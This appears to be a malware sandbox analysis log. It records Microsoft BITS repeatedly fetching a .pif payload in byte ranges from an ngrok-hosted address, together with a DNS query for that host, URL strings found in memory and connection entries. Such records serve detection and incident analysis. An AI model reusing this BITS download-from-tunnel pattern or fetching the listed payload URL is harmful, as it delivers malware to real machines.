Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=20982-21090User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=21091-21204User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=21205-21507User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=21508-21870User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=21871-22267User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=22268-22879User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=22880-22981User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=22982-23035User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=23036-23581User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=23582-23937User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=23938-24148User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=24149-24347User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=24348-24471User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=24472-24932User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=24933-25123User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=25124-25628User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=25629-25726User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=25727-26010User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=26011-26211User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=26212-26216User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=26217-26349User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=26350-26568User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=26569-26692User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=26693-26829User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=26830-26948User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=26949-27430User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=27431-27464User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=27465-27709User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=27710-27798User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=27799-28198User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=28199-28688User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=28689-28921User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=28922-29086User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=29087-29196User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=29197-29411User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=29412-29606User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=29607-29715User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=29716-29731User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=29732-29734User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=29735-29904User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=29905-30142User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=30143-30344User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=30345-30857User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=30858-31158User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=31159-31215User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=31216-31287User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=31288-31631User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=31632-31965User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=31966-32191User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=32192-32418User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=32419-32452User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=32453-32713User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=32714-32891User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=32892-33478User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=33479-34087User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=34088-34273User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=34274-34324User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=34325-34333User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=34334-34425User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=34426-34846User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=34847-34993User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=34994-35102User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=35103-35206User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=35207-35497User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=35498-35606User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=35607-35839User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=35840-36005User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=36006-36242User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=36243-36590User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=36591-36605User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=36606-36654User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=36655-37168User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=37169-37707User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=37708-38137User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=38138-38375User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=38376-38402User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=38403-38566User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=38567-38892User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=38893-39296User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficHTTP traffic detected: GET //BITZX.pif HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMTRange: bytes=39297-39850User-Agent: Microsoft BITS/7.8Host: 041224.ngrok-free.app
Source: global trafficDNS traffic detected: DNS query: 041224.ngrok-free.app
Source: svchost.exe, 00000004.00000002.5975466240.00000203C8EFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: svchost.exe, 00000004.00000002.5975466240.00000203C8EFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000004.00000002.5975466240.00000203C8EFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: edb.log.4.dr, qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/update2/actxsdodvxbjblyjfcbcbc7srcwa_1.3.36.242/GoogleUpda
Source: qmgr.db.4.drString found in binary or memory: http://r4---sn-5hnekn7k.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93
Source: qmgr.db.4.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93.0.457
Source: qmgr.db.4.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/aciwgjnovhktokhzyboslawih45a_2700/jflook
Source: qmgr.db.4.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/acze3h5f67uhtnjsyv6pabzn277q_298/lmelgle
Source: qmgr.db.4.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/dp66roauucji6olf7ycwe24lea_6869/hfnkpiml
Source: qmgr.db.4.drString found in binary or memory: http://storage.googleapis.com/update-delta/ggkkehgbnfjpeggfpleeakpidbkibbmn/2021.9.13.1142/2021.9.7.
Source: qmgr.db.4.drString found in binary or memory: http://storage.googleapis.com/update-delta/jamhcnnkihinmdlkakkaopbjbbcngflc/96.0.4648.2/96.0.4642.0/
Source: qmgr.db.4.drString found in binary or memory: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/45/43/19f2dc8e4c5c5d0383
Source: svchost.exe, 00000004.00000002.5975466240.00000203C8EFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: svchost.exe, 00000004.00000002.5972966531.00000203C7281000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://041224.ngrok-free.app/
Source: svchost.exe, 00000004.00000002.5975528957.00000203C8F20000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1009501159.00000203D1081000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.3490636884.00000203D1087000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.4738936657.00000203D1089000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2862034260.00000203D1086000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.5976881206.00000203D1400000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.5976216242.00000203C8FD9000.00000004.00000020.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: https://041224.ngrok-free.app//BITZX.pif
Source: svchost.exe, 00000004.00000002.5976216242.00000203C8FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://041224.ngrok-free.app//BITZX.pif-
Source: bitsadmin.exe, 00000002.00000002.5970078214.0000019F7CC20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://041224.ngrok-free.app//BITZX.pifC:
Source: svchost.exe, 00000004.00000002.5975189197.00000203C8EA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://041224.ngrok-free.app:443//BITZX.pif
Source: qmgr.db.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: qmgr.db.4.drString found in binary or memory: https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xmlPC:
Source: svchost.exe, 00000004.00000002.5975466240.00000203C8EFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
